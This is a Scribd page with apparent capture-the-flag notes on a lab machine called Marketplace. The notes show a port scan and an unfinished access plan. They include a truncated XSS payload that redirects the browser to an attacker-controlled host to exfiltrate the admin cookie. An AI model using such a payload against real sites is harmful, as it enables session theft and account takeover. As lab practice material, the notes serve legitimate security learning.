Scribd
Upload
8 views4 pages

Marketplace

The document details the results of a port scan on the IP address 10.10.166.219 using RustScan, revealing open ports for SSH, HTTP, and a Node.js application. It also discusses initial access attempts, highlighting the effectiveness of XSS for stealing admin cookies to access restricted pages. Additionally, it mentions potential exploits for privilege escalation and provides links to further resources.

Uploaded by

repilex959
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
8 views4 pages

Marketplace

The document details the results of a port scan on the IP address 10.10.166.219 using RustScan, revealing open ports for SSH, HTTP, and a Node.js application. It also discusses initial access attempts, highlighting the effectiveness of XSS for stealing admin cookies to access restricted pages. Additionally, it mentions potential exploits for privilege escalation and provides links to further resources.

Uploaded by

repilex959
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 4

Marketplace

Initial Scan
root@ip-10-10-112-185:~# rustscan -a 10.10.166.219 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.\U0001f422

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"


[~] File limit higher than batch size. Can increase speed by increasing batch size
Open 10.10.166.219:22
Open 10.10.166.219:80
Open 10.10.166.219:32768
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

PORT STATE SERVICE REASON VERSION


22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
| ssh-hostkey:
| 2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLj5F//uf40JILlSfWp95GsOiu
| 256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAy

Marketplace 1
| 256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA2ol/CJc6HIWgvu6KQ7lZ6WWgN
80/tcp open http syn-ack nginx 1.19.2
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-server-header: nginx/1.19.2
|_http-title: The Marketplace
32768/tcp open http syn-ack Node.js (Express middleware)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Initial Access

🚨 Tried to do a lot a stuff, XSS, JSON web token, SQL injections. But the
XSS works the better. There is a page only admin can acces if i can steal
the admin cookie with the XSS i would be able to access the admin page

<script>document.location='http://10.10.112.185:8000/XSS/grabber.php?c='+doc

Marketplace 2
Privilege Escalation

🚨
Futher Ennumeration

🚨
Marketplace 3
Creds
Services User names Passwords

Exploits links
https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/

Marketplace 4

You might also like